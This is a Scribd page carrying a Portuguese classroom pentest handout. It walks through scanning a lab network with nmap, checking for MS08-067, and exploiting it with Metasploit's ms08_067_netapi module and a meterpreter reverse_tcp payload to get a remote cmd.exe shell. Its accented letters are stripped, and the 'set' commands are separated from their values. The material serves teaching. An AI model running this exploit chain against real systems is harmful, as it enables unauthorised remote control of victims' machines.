Scribd Logo
Fazer o upload

Bem-vindo(a) ao Scribd!

  • Met As Ploit

    Enviado por

    André Luiz Rodrigues Ferreira
    4 visualizações4 páginas

    Título original

    Met as Ploit

    Direitos autorais

    © Attribution Non-Commercial (BY-NC)

    Formatos disponíveis

    PDF, TXT ou leia online no Scribd

    Você considera este documento útil?

    Este conteúdo é inapropriado?

    Denunciar este documento

    Direitos autorais:

    Attribution Non-Commercial (BY-NC)
    Baixe no formato PDF, TXT ou leia online no Scribd
    Sinalizar o conteúdo como inadequado
    4 visualizações4 páginas

    Met As Ploit

    Enviado por

    André Luiz Rodrigues Ferreira

    Direitos autorais:

    Attribution Non-Commercial (BY-NC)
    Baixe no formato PDF, TXT ou leia online no Scribd
    Sinalizar o conteúdo como inadequado
    de 4

    Prtica Usando Metasploit Aula prtica PENTEST

    Ambiente da aula: Duas esto de trabalho com MS Windows XP Home Edition Service Pack 2; Quatro estaes com live DVD BackTrack 4 final; Ferramentas utilizadas: Metasploit 3.3; nmap; Utilitrios de linha de comando do MS Windows (cmd, mkdir, etc); Exploit Meterpreter; Buscando o alvo Para realizar um mapeamento da rede e saber quais estaes esto ativas ns iremos usar o NMAP. #nmap -v 192.168.0.0/24 Aps identificar os possveis alvos (estaes Windows), vamos verificar qual a verso do sistema operacional: #nmap -O 192.168.0.XX Usar o endereo IP dos possveis alvos!

    Nosso alvo ser um MS Windows XP com SP2 Iremos explorar a seguinte vulnerabilidade http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx http://www.securityfocus.com/bid/31874/info Vamos ento usar o NMAP para identificar se o nosso alvo possui a vulnerabilidade descrita nos links acima: #nmap -v --script=smb-check-vulns 192.168.0.XX IP do alvo!

    Aps detectar a vulnerabilidade do sistema, vamos ento iniciar as atividade com o Metasploit (www.metasploit .com): Vamos iniciar o MSF no modo console:
    #msfconsole

    Vamos ento selecionar o exploit que queremos utilizar:


    msf > use exploit/windows/smb/ms08_067_netapi msf > set msf > set

    msf > set msf > exploit

    Este explora a vulnerabilidade dos links! RHOST 192.168.0.XX Determina o IP do alvo. PAYLOAD windows/meterpreter/reverse_tcp Cdigo malicioso. LHOST 192.168.0.YY O seu IP.

    PRONTO!!!!! Se tudo deu certo j estamos dentro do sistema alvo. Execute o ? para obter ajuda para os comando do METERPRETER: meterpreter > ? meterpreter > sysinfo Vamos agora executar o CMD.EXE na mquina remota: meterpreter > execute -f cmd.exe -c Vai executar o cmd.exe da mquina remota no prompt atual. meterpreter > interact 1 Trs a sesso para o canal 1.

    Agora pessoal s usar a mente brilhante e ter boas ideia. PARABNS!!!!! REFERNCIAS http://www.microsoft.com/brasil/windowsxp/using/helpandsupport/learnmore/ballew_commandli ne.mspx http://pt.wikipedia.org/wiki/Lista_de_comandos_do_MS-DOS http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx http://www.securityfocus.com/bid/31874/info http://www.metasploit.com http://nmap.org/

    Você também pode gostar